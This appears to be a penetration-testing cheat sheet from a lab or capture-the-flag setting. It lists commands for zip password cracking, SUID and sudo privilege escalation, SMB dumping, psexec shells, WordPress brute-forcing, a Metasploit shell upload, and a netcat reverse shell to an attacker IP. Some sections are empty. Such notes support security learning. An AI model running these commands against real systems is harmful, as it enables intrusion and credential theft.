1. Crack the Passwd of Zip Package
1
2
| zip2john backup.zip > passwd.txt
john passwd.txt
|
2. Find
- Find file with suid
1
| find / -perm -u=s 2>/dev/null
|
If we got it ,we can go to GTFobins to check out whether it is possible for Privilege Escalation
- Find file for special group
1
| find / -type f -group bugtracker 2>/dev/null
|
- Find file
1
2
|
find / -name "user.txt"
|
1
2
|
Get-ChildItem -Recurse –Filter user.txt
|
3. smb
If the target machine with port 445 opened, we can check out the file under directory if no auth:
and then dump file from directory:
1
2
| smbclient \\\\10.10.10.27\\backup/
get filename
|
When we got the username and password, to get a shell
1
| python3 psexec.py adminstrator@10.10.10.27
|
4. Upgrade Shell to tty
1
2
3
| SHELL=/bin/bash script -q /dev/null
python3 -c "import pty;pty.spawn('/bin/bash')"
|
5. Sudo
view the special permissions of current role:
When a command can be executed with sudo , we can use this command to open a new bash shell to get root privilege .
For example, ! /bin/bash in Vim.
6. Website
Search for subdirectory
1
| gobuster dir -u http://10.10.10.29 -w /usr/share/wordlists/dirb/big.txt
|
Analyze
1
| nikto -host http://10.10.10.28 -o _28.html
|
WordPress
Enumerate accounts and Brute Force the password
1
| wpscan --url http://10.10.10.29/wordpress --enumerate
|
1
| wpscan --url http://10.10.10.29/wordpress -U users.txt -P backupPasswords
|
use metasploit
1
| use exploit/unix/webapp/wp_admin_shell_upload
|
NetCat
Reverse:
1
| nc.exe -a "-e cmd.exe 10.10.16.4 7777"
|
Listen:
Dump Cached password
Comments